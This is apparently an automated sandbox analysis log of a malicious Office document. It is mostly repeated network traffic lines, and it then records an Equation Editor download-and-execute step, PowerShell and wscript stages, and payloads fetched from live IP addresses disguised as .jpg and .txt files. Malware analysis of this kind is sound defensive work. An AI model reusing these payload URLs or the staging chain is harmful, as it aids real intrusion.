                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 41.216.183.13:80 -> 192.168.2.22:49162
                  Source: TrafficSnort IDS: 2020425 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M1 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: TrafficSnort IDS: 2020425 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M1 192.3.243.156:80 -> 192.168.2.22:49167
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 41.216.183.13 80Jump to behavior
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, type: UNPACKEDPE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205CF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035205CF
                  Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.br
                  Source: global trafficHTTP traffic detected: GET /ourTraditionalbase.txt HTTP/1.1Host: 192.3.243.156Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ourTraditionalbase.txt HTTP/1.1Host: 192.3.243.156
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /portugalslovenia.jpeg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.156Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.156
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205CF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035205CF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\portugalslovenia[1].jpgJump to behavior
                  Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.br
                  Source: global trafficHTTP traffic detected: GET /portugalslovenia.jpeg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.156Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13
                  Source: global trafficHTTP traffic detected: GET /ourTraditionalbase.txt HTTP/1.1Host: 192.3.243.156Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ourTraditionalbase.txt HTTP/1.1Host: 192.3.243.156
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: powershell.exe, 00000006.00000002.479060921.00000000025B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.156
                  Source: powershell.exe, 00000006.00000002.482820667.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.479060921.00000000025B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.156/ourTraditionalbase.txt
                  Source: EQNEDT32.EXE, 00000002.00000002.462891948.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.156/portugalslovenia.jpega
                  Source: EQNEDT32.EXE, 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.156/portugalslovenia.jpegj
                  Source: EQNEDT32.EXE, 00000002.00000002.462891948.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.156/portugalslovenia.jpegr
                  Source: EQNEDT32.EXE, 00000002.00000002.462891948.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.156/portugalslovenia.jpeguuC:
                  Source: wscript.exe, 00000005.00000002.484789084.00000000001C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484687327.000000000075D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.484826885.000000000075E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484692972.0000000000756000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.484826885.0000000000757000.00000004.00000020.00020000.00000000.sdmp, portugalslovenia[1].jpg.2.dr, portugalslovenia.js.2.drString found in binary or memory: http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txt
                  Source: wscript.exe, 00000005.00000002.484826885.0000000000773000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484735410.000000000075D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484751886.0000000000772000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484687327.000000000075D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtC:
                  Source: wscript.exe, 00000005.00000003.484540516.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.484859196.00000000007A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtz
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: powershell.exe, 00000006.00000002.478435107.00000000005FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
